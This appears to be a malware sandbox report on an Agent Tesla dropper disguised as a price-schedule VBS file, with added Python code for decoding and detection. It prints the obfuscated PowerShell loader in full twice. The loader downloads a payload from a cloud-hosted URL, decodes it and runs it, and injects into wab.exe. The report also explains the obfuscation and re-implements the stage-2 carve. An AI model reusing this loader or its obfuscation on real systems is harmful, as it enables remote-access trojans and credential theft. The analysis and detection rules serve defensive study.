Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    21/05/2024, 03:42

General

  • Target

    RFQINL21052024_PRICE SCHEDULE.vbs

  • Size

    5KB

  • MD5

    ebdb23546bd0e7f4aee2a75909460482

  • SHA1

    5e11c38b784b7337fc2cc6ab7100c0240476c7a2

  • SHA256

    b1f6ace20017902dbd10246ef780c162d7efa2c6eaa26934b45a784223c72293

  • SHA512

    b16b6573af01d2bd2314c5de1d6dd6e4cbe8080ae0b72fe9180c95f27034e69cef1b1e078162ce7783195f37050d72c9e27940b73203586cc3e1908841faf234

  • SSDEEP

    96:QN7IU07Fzr15ZV3J0j9b0xF6Q/0Gb1plVB4CXcZQfp:QFO7hB/pJ0xb2Fn/hpLCCXcKfp

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a .NET remote access trojan (RAT) and credential stealer; early versions were written in Visual Basic .NET.

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely a geofence check.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQINL21052024_PRICE SCHEDULE.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1080
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Respondency = 1;$Cryptovalency='Sub';$Cryptovalency+='strin';$Cryptovalency+='g';Function Orthopsychiatric($Vagtskrmenes){$Niedersachsen=$Vagtskrmenes.Length-$Respondency;For($Propping=1;$Propping -lt $Niedersachsen;$Propping+=2){$militrmissioner+=$Vagtskrmenes.$Cryptovalency.Invoke( $Propping, $Respondency);}$militrmissioner;}function Anthoxanthin($vindruernes){& ($Elev) ($vindruernes);}$Stabstamburers=Orthopsychiatric ' MIoUz i lClLa,/ 5T.,0, ,(KW i.nEd,o,wFs iNGTB N1T0,.U0 ; UW.i nK6D4.;H x.6 4 ;L r,v.: 1C2 1O.,0 )I GTe c.k o,/.2E0 1,0S0T1L0.1 .FBi,r eYfNo,x /.1 2 1 .A0m ';$tickless=Orthopsychiatric 'pUEste r -TAUg,eSnPt, ';$Lance=Orthopsychiatric 'FhRtTt p ss:I/F/ddkrFi vKeA.BgNo.omg l,eE. c,o,m,/OuBcC? ePx peoSr tB=,dSoBwRnzl oMa,d &Ci dB=V1.wAsTY VTlAWBzBj p sFR gRT,8.NR2Gz N P K,5 jTI.fUMAF,1BN o _,d N. ';$Weetbird=Orthopsychiatric ',>, ';$Elev=Orthopsychiatric '.i eDxB ';$Ultra='Termine';$Galopade = Orthopsychiatric 'Pe c h o N%WaFpWp dma,tEaT%S\DM,a c c oB.aC.otf, & & e cSh o .t ';Anthoxanthin (Orthopsychiatric ' $,gClLoSbHaPl.: B lNe,g nQb eItPs =d( c,mCdA /ScG D$CG aBl o p amd e.)H ');Anthoxanthin (Orthopsychiatric 'K$ g lToCbTaGlY:OL o nTg hMaSi rR=.$ULsa n c.e,.IsFpDl.ift (T$SW e eBt,bSiGr dR)U ');$Lance=$Longhair[0];$folkemorderiske= (Orthopsychiatric 'o$ g l oSbFa lB:MACn t.i oWcFhVu.sT=FN eDw -.O b j e,c t PS,yTsPt,e,mC.,N,e t .DW eOb,CGlAiAeDnPt');$folkemorderiske+=$Blegnbets[1];Anthoxanthin ($folkemorderiske);Anthoxanthin (Orthopsychiatric ' $gA,nat,i o.cShhuPsS. 
HFeBaAdNeKr s [T$ t i cCk l e s sK],=k$ SIt aGbSsKtWaTm b.uSr.eOrCsB ');$Gigantesque=Orthopsychiatric ' $ Abn t iHoScVh u s..sD oTw.n.lPo a dHFSiDl eD( $,LTa nHcAe.,I$AFSa.m e l e,sSsDnseCs ss)H ';$Famelessness=$Blegnbets[0];Anthoxanthin (Orthopsychiatric ' $OgTl oRbIaPlO:.CAaUc oSePpVi.sVt i.cG=.(TTAeTs.t,-tPMa,tLhF I$ F a m ePlGe s s n e s s,)B ');while (!$Cacoepistic) {Anthoxanthin (Orthopsychiatric 'F$PgTlToFbOa,l :,S u l pShboNz iSn.cMaAt,e,= $Gt,r uHeL ') ;Anthoxanthin $Gigantesque;Anthoxanthin (Orthopsychiatric ' SSt aUr tp-,S lPe eupC ,4 ');Anthoxanthin (Orthopsychiatric 'R$EgIl oTb a,lF: C.aTclo e,p i.sBtAiRcB=A(,T,eCsAtI- PQaLtIhR $KF aumCe,l eCsMs,n.e s s,), ') ;Anthoxanthin (Orthopsychiatric ' $,g.l.oPbIa l,:CVaaKl.eRt.a.g eR= $ g.l,oUb aCl.:sSGmLaHd.d e,r k a,s sUeE+C+A% $,L.o nNg.h aBi r .WcPoOu nPtT ') ;$Lance=$Longhair[$Valetage];}$Symbiotism=358810;$Programmeringsmuligheder=27231;Anthoxanthin (Orthopsychiatric '.$.gKl o bSa l.:SO,m,s.t nKi,nLgGsKu,dSvHivk.l i nKg,e.n ,= G,e.tS-,C.o nKt eGnKt O$ F a,mKeTlDe sUsSnreas sM ');Anthoxanthin (Orthopsychiatric 'H$SgKl oAbUaSl : PUhUoTtHo l,yLt e. P=, H[ISAySsStHeFm .CCpoin vMe,rKt.]P:,:DFDr oSmEBFaBs.eP6B4 S,tPrCi,n.gu( $LOAmSs tMnuiUn g,sSuQdPvBi.k lDiBn,g e nG), ');Anthoxanthin (Orthopsychiatric ',$TgRl o b a lS: USdRrOyPdAdCeglKsGeTrTsF2N1F6S I=. [.S yMs,tRebmE.BT.eGxotF.REBn cUo.dsion g ] :.:MAFSUCCIGI..KGSe,tDSEtMr iPn g ( $ PghWo,t o lKyDtFe ). ');Anthoxanthin (Orthopsychiatric '.$,gPl oJb a lL:Pa p.p lGe dFrRo,n e = $.U.d rQy dBd eplLsReTrSs.2H1 6B. sTu b s tSrBiSn.gU(A$BS,yFmUbSiDo tMi,sBmS, $UPHrSoRg,r a.mKm e.r inn,g.sLm uPlSiTg h eNdUedr,) ');Anthoxanthin $appledrone;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5036
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Macco.Cof && echo t"
        3⤵
          PID:1516
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Respondency = 1;$Cryptovalency='Sub';$Cryptovalency+='strin';$Cryptovalency+='g';Function Orthopsychiatric($Vagtskrmenes){$Niedersachsen=$Vagtskrmenes.Length-$Respondency;For($Propping=1;$Propping -lt $Niedersachsen;$Propping+=2){$militrmissioner+=$Vagtskrmenes.$Cryptovalency.Invoke( $Propping, $Respondency);}$militrmissioner;}function Anthoxanthin($vindruernes){& ($Elev) ($vindruernes);}$Stabstamburers=Orthopsychiatric ' MIoUz i lClLa,/ 5T.,0, ,(KW i.nEd,o,wFs iNGTB N1T0,.U0 ; UW.i nK6D4.;H x.6 4 ;L r,v.: 1C2 1O.,0 )I GTe c.k o,/.2E0 1,0S0T1L0.1 .FBi,r eYfNo,x /.1 2 1 .A0m ';$tickless=Orthopsychiatric 'pUEste r -TAUg,eSnPt, ';$Lance=Orthopsychiatric 'FhRtTt p ss:I/F/ddkrFi vKeA.BgNo.omg l,eE. c,o,m,/OuBcC? ePx peoSr tB=,dSoBwRnzl oMa,d &Ci dB=V1.wAsTY VTlAWBzBj p sFR gRT,8.NR2Gz N P K,5 jTI.fUMAF,1BN o _,d N. ';$Weetbird=Orthopsychiatric ',>, ';$Elev=Orthopsychiatric '.i eDxB ';$Ultra='Termine';$Galopade = Orthopsychiatric 'Pe c h o N%WaFpWp dma,tEaT%S\DM,a c c oB.aC.otf, & & e cSh o .t ';Anthoxanthin (Orthopsychiatric ' $,gClLoSbHaPl.: B lNe,g nQb eItPs =d( c,mCdA /ScG D$CG aBl o p amd e.)H ');Anthoxanthin (Orthopsychiatric 'K$ g lToCbTaGlY:OL o nTg hMaSi rR=.$ULsa n c.e,.IsFpDl.ift (T$SW e eBt,bSiGr dR)U ');$Lance=$Longhair[0];$folkemorderiske= (Orthopsychiatric 'o$ g l oSbFa lB:MACn t.i oWcFhVu.sT=FN eDw -.O b j e,c t PS,yTsPt,e,mC.,N,e t .DW eOb,CGlAiAeDnPt');$folkemorderiske+=$Blegnbets[1];Anthoxanthin ($folkemorderiske);Anthoxanthin (Orthopsychiatric ' $gA,nat,i o.cShhuPsS. 
HFeBaAdNeKr s [T$ t i cCk l e s sK],=k$ SIt aGbSsKtWaTm b.uSr.eOrCsB ');$Gigantesque=Orthopsychiatric ' $ Abn t iHoScVh u s..sD oTw.n.lPo a dHFSiDl eD( $,LTa nHcAe.,I$AFSa.m e l e,sSsDnseCs ss)H ';$Famelessness=$Blegnbets[0];Anthoxanthin (Orthopsychiatric ' $OgTl oRbIaPlO:.CAaUc oSePpVi.sVt i.cG=.(TTAeTs.t,-tPMa,tLhF I$ F a m ePlGe s s n e s s,)B ');while (!$Cacoepistic) {Anthoxanthin (Orthopsychiatric 'F$PgTlToFbOa,l :,S u l pShboNz iSn.cMaAt,e,= $Gt,r uHeL ') ;Anthoxanthin $Gigantesque;Anthoxanthin (Orthopsychiatric ' SSt aUr tp-,S lPe eupC ,4 ');Anthoxanthin (Orthopsychiatric 'R$EgIl oTb a,lF: C.aTclo e,p i.sBtAiRcB=A(,T,eCsAtI- PQaLtIhR $KF aumCe,l eCsMs,n.e s s,), ') ;Anthoxanthin (Orthopsychiatric ' $,g.l.oPbIa l,:CVaaKl.eRt.a.g eR= $ g.l,oUb aCl.:sSGmLaHd.d e,r k a,s sUeE+C+A% $,L.o nNg.h aBi r .WcPoOu nPtT ') ;$Lance=$Longhair[$Valetage];}$Symbiotism=358810;$Programmeringsmuligheder=27231;Anthoxanthin (Orthopsychiatric '.$.gKl o bSa l.:SO,m,s.t nKi,nLgGsKu,dSvHivk.l i nKg,e.n ,= G,e.tS-,C.o nKt eGnKt O$ F a,mKeTlDe sUsSnreas sM ');Anthoxanthin (Orthopsychiatric 'H$SgKl oAbUaSl : PUhUoTtHo l,yLt e. P=, H[ISAySsStHeFm .CCpoin vMe,rKt.]P:,:DFDr oSmEBFaBs.eP6B4 S,tPrCi,n.gu( $LOAmSs tMnuiUn g,sSuQdPvBi.k lDiBn,g e nG), ');Anthoxanthin (Orthopsychiatric ',$TgRl o b a lS: USdRrOyPdAdCeglKsGeTrTsF2N1F6S I=. [.S yMs,tRebmE.BT.eGxotF.REBn cUo.dsion g ] :.:MAFSUCCIGI..KGSe,tDSEtMr iPn g ( $ PghWo,t o lKyDtFe ). ');Anthoxanthin (Orthopsychiatric '.$,gPl oJb a lL:Pa p.p lGe dFrRo,n e = $.U.d rQy dBd eplLsReTrSs.2H1 6B. sTu b s tSrBiSn.gU(A$BS,yFmUbSiDo tMi,sBmS, $UPHrSoRg,r a.mKm e.r inn,g.sLm uPlSiTg h eNdUedr,) ');Anthoxanthin $appledrone;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2400
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Macco.Cof && echo t"
            4⤵
              PID:4576
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5012
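The two PowerShell command lines above are the same script, so one decoder covers both. Its only obfuscation is the Orthopsychiatric function: each string literal carries the real text at odd character offsets and filler at even offsets, and Anthoxanthin is simply `& iex`. Decoded, the script sets a User-Agent header, splits a URL list on ">", loops DownloadFile / Start-Sleep 4 / Test-Path until %appdata%\Macco.Cof exists (the cmd.exe child exists only to expand that path and to echo a lone "t", which completes the string "System.Net.WebClien"), then reads the file, base64-decodes it, takes Substring(358810, 27231) of the result and passes that to iex. The download literal, read at odd offsets, spells out a drive.google.com host, which is what the "Legitimate hosting services abused" signature refers to. The Python below is an added example, not the dropper's code or the sandbox's: it re-implements the decoder, a literal extractor for a script body, and the stage-2 carve. One caveat: the report rendering collapsed runs of spaces inside the long literals, so only the three short literals are copied from this page; the other inputs are constructed, and the Macco.Cof sample is a constructed stand-in for a file this page does not contain.

```python
import base64
import re

# Re-implementation (not the dropper's code) of Orthopsychiatric(): the script
# loops i = 1, 3, 5, ... while i < len-1 and appends Substring(i, 1), so the
# plaintext sits at odd offsets and every even offset is throw-away filler.
def decode_odd_offsets(s: str) -> str:
    return "".join(s[i] for i in range(1, len(s) - 1, 2))

# Inverse of the above, used only to build constructed samples for this example.
# Filler is deterministic so the sample is reproducible; the real dropper used
# random letters, punctuation and spaces (which is why runs of spaces were
# collapsed when the report was rendered).
def encode_odd_offsets(plain: str, filler: str = "XyZ") -> str:
    out = [filler[n % len(filler)] + ch for n, ch in enumerate(plain)]
    out.append(filler[:2])  # trailing pad the decoder loop never reaches
    return "".join(out)

# Three literals copied verbatim from the report's command line.  They are short
# enough to have survived rendering intact; the longer ones (User-Agent value,
# URL, echo command) lost characters and do not decode byte-for-byte from here.
REPORT_LITERALS = {
    "tickless": "pUEste r -TAUg,eSnPt, ",   # header name used for the download
    "Elev":     ".i eDxB ",                 # the cmdlet Anthoxanthin() invokes
    "Weetbird": ",>, ",                     # separator for the URL list
}

def decode_report_literals() -> dict:
    return {name: decode_odd_offsets(lit) for name, lit in REPORT_LITERALS.items()}

# Every Orthopsychiatric '...' literal in a script body, decoded in order.
LITERAL_RE = re.compile(r"Orthopsychiatric\s*'([^']*)'")

def decode_script(script: str) -> list:
    return [decode_odd_offsets(lit) for lit in LITERAL_RE.findall(script)]

# Stage 2 of the loader: Get-Content the downloaded file, FromBase64String,
# UTF8.GetString, then Substring(358810, 27231) selects the real script out of
# a larger blob and hands it to iex.  Same carve, offline, on a string.
STAGE2_OFFSET = 358810   # $Symbiotism in the script
STAGE2_LENGTH = 27231    # $Programmeringsmuligheder in the script

def carve_stage2(b64_blob: str, offset: int = STAGE2_OFFSET,
                 length: int = STAGE2_LENGTH) -> str:
    text = base64.b64decode(b64_blob).decode("utf-8")
    return text[offset:offset + length]

# Constructed stand-in for Macco.Cof: base64 of filler text with a payload
# planted at a known character offset.  Not the real file (not on this page).
def build_constructed_blob(payload: str, offset: int) -> str:
    filler = "0123456789"
    body = (filler * (offset // len(filler) + 1))[:offset] + payload + filler * 3
    return base64.b64encode(body.encode("utf-8")).decode("ascii")

if __name__ == "__main__":
    for name, value in decode_report_literals().items():
        print(f"{name:9} -> {value!r}")
    sample = "$x=Orthopsychiatric '" + encode_odd_offsets("Start-Sleep 4") + "';"
    print(decode_script(sample))
    blob = build_constructed_blob("Write-Host stage2", 120)
    print(carve_stage2(blob, 120, len("Write-Host stage2")))
```

To decode a pristine copy of the script, paste the command line into `decode_script`; against the text on this page, expect the long literals to come out with a character dropped wherever two spaces were collapsed into one.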
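The process tree is also the cheapest place to catch this chain: a script host spawning PowerShell, a 64-bit PowerShell re-launching the SysWOW64 (32-bit) PowerShell, and that 32-bit PowerShell starting wab.exe with no arguments while the sandbox flags SetThreadContext, WriteProcessMemory and MapViewOfSection on it, which is the pattern of a hollowed host process. The Python below is an added example, not from the report: it runs three parent-child rules over constructed Sysmon-style process-creation records. The first five records' PIDs, images and command lines mirror the tree above (the long PowerShell command lines are trimmed); the parent PID 700 for WScript.exe and the final benign PowerShell record are constructed.

```python
import re

# Constructed Sysmon-style process-creation records (Event ID 1, trimmed to the
# fields the rules use).  The first five mirror the report's process tree; the
# long PowerShell command lines are trimmed.  ppid 700 for WScript.exe and the
# last, benign PowerShell record are constructed placeholders.
EVENTS = [
    dict(pid=1080, ppid=700,
         image=r"C:\Windows\System32\WScript.exe",
         cmd=r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQINL21052024_PRICE SCHEDULE.vbs"'),
    dict(pid=5036, ppid=1080,
         image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         cmd=r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Respondency = 1;..."'),
    dict(pid=1516, ppid=5036,
         image=r"C:\Windows\system32\cmd.exe",
         cmd=r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Macco.Cof && echo t"'),
    dict(pid=2400, ppid=5036,
         image=r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe",
         cmd=r'"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Respondency = 1;..."'),
    dict(pid=5012, ppid=2400,
         image=r"C:\Program Files (x86)\windows mail\wab.exe",
         cmd=r'"C:\Program Files (x86)\windows mail\wab.exe"'),
    dict(pid=9000, ppid=700,   # constructed benign admin script; must not fire
         image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         cmd=r'powershell.exe -ExecutionPolicy Bypass -File C:\ops\inventory.ps1'),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = "powershell.exe"

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def build_index(events):
    return {e["pid"]: e for e in events}

def ancestry(index, pid):
    """[self, parent, grandparent, ...] as far as the records go."""
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        chain.append(index[pid])
        pid = index[pid]["ppid"]
    return chain

def chain_string(index, pid) -> str:
    return " > ".join(basename(e["image"]) for e in reversed(ancestry(index, pid)))

def args_after_image(cmd: str) -> str:
    """Everything after the (possibly quoted) image token of a command line."""
    m = re.match(r'^(?:"[^"]*"|\S+)\s*(.*)$', cmd.strip())
    return m.group(1) if m else ""

def evaluate(events):
    """Return (rule, pid) pairs for every record that trips a rule."""
    index = build_index(events)
    hits = []
    for e in events:
        chain = ancestry(index, e["pid"])
        parent = chain[1] if len(chain) > 1 else None
        me = basename(e["image"])
        par = basename(parent["image"]) if parent else ""
        # 1. wscript/cscript launching PowerShell: VBS droppers almost always do this.
        if me == POWERSHELL and par in SCRIPT_HOSTS:
            hits.append(("script_host_spawns_powershell", e["pid"]))
        # 2. 64-bit PowerShell re-launching the 32-bit one: needed to inject into
        #    a 32-bit host such as the wab.exe under Program Files (x86).
        if (me == POWERSHELL and par == POWERSHELL
                and "\\syswow64\\" in e["image"].lower()
                and "\\syswow64\\" not in parent["image"].lower()):
            hits.append(("powershell_arch_downgrade", e["pid"]))
        # 3. PowerShell starting wab.exe with an empty command line: the Windows
        #    Address Book has no reason to run this way; it is a hollowing target.
        if me == "wab.exe" and par == POWERSHELL and args_after_image(e["cmd"]) == "":
            hits.append(("powershell_spawns_argless_wab", e["pid"]))
    return hits

if __name__ == "__main__":
    idx = build_index(EVENTS)
    for rule, pid in evaluate(EVENTS):
        print(f"{rule:32} pid={pid}  chain: {chain_string(idx, pid)}")
```

Rule 3 is the one worth tuning in production: widen it to other argument-less children of PowerShell under Program Files (x86) that the same loader family is known to target, but keep the "no arguments" condition, since that is what separates the injection target from a user opening the application.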

      Network

            MITRE ATT&CK Enterprise v15

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g2cq0i04.2vu.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Roaming\Macco.Cof

              Filesize

              502KB

              MD5

              7f40a091f1c133333e814a35fe64d807

              SHA1

              8d278db73f3e270f33b743f358a9cfa1e3bdbe37

              SHA256

              5454057fe5e349e2139169937a8bb6d34b4e6e6ba83bccebaa4e701f3ccc3edb

              SHA512

              d930b6c0ca34da1f9cad04b5b65218bc98dde299c85627c659ae5a2f25c5321f353f1b826ee4e8bebfa32a2b7184c7a5c69c9e6a4fff42e9232f8604d511dfcb

            • memory/2400-33-0x0000000006340000-0x000000000635A000-memory.dmp

              Filesize

              104KB

            • memory/2400-30-0x0000000005D90000-0x0000000005DAE000-memory.dmp

              Filesize

              120KB

            • memory/2400-35-0x0000000006FE0000-0x0000000007002000-memory.dmp

              Filesize

              136KB

            • memory/2400-15-0x0000000004810000-0x0000000004846000-memory.dmp

              Filesize

              216KB

            • memory/2400-16-0x0000000004EE0000-0x0000000005508000-memory.dmp

              Filesize

              6.2MB

            • memory/2400-17-0x0000000005540000-0x0000000005562000-memory.dmp

              Filesize

              136KB

            • memory/2400-18-0x00000000056E0000-0x0000000005746000-memory.dmp

              Filesize

              408KB

            • memory/2400-19-0x0000000005750000-0x00000000057B6000-memory.dmp

              Filesize

              408KB

            • memory/2400-29-0x00000000058C0000-0x0000000005C14000-memory.dmp

              Filesize

              3.3MB

            • memory/2400-38-0x00000000085D0000-0x000000000CED9000-memory.dmp

              Filesize

              73.0MB

            • memory/2400-31-0x0000000005E50000-0x0000000005E9C000-memory.dmp

              Filesize

              304KB

            • memory/2400-32-0x00000000073F0000-0x0000000007A6A000-memory.dmp

              Filesize

              6.5MB

            • memory/2400-36-0x0000000008020000-0x00000000085C4000-memory.dmp

              Filesize

              5.6MB

            • memory/2400-34-0x0000000007050000-0x00000000070E6000-memory.dmp

              Filesize

              600KB

            • memory/5012-59-0x00000000247B0000-0x0000000024800000-memory.dmp

              Filesize

              320KB

            • memory/5012-60-0x00000000248A0000-0x0000000024932000-memory.dmp

              Filesize

              584KB

            • memory/5012-55-0x0000000000AC0000-0x0000000000B02000-memory.dmp

              Filesize

              264KB

            • memory/5012-54-0x0000000000AC0000-0x0000000001D14000-memory.dmp

              Filesize

              18.3MB

            • memory/5012-61-0x00000000247A0000-0x00000000247AA000-memory.dmp

              Filesize

              40KB

            • memory/5036-58-0x00007FFC7BB40000-0x00007FFC7C601000-memory.dmp

              Filesize

              10.8MB

            • memory/5036-40-0x00007FFC7BB40000-0x00007FFC7C601000-memory.dmp

              Filesize

              10.8MB

            • memory/5036-1-0x000001A61D080000-0x000001A61D0A2000-memory.dmp

              Filesize

              136KB

            • memory/5036-39-0x00007FFC7BB43000-0x00007FFC7BB45000-memory.dmp

              Filesize

              8KB

            • memory/5036-0-0x00007FFC7BB43000-0x00007FFC7BB45000-memory.dmp

              Filesize

              8KB

            • memory/5036-11-0x00007FFC7BB40000-0x00007FFC7C601000-memory.dmp

              Filesize

              10.8MB

            • memory/5036-12-0x00007FFC7BB40000-0x00007FFC7C601000-memory.dmp

              Filesize

              10.8MB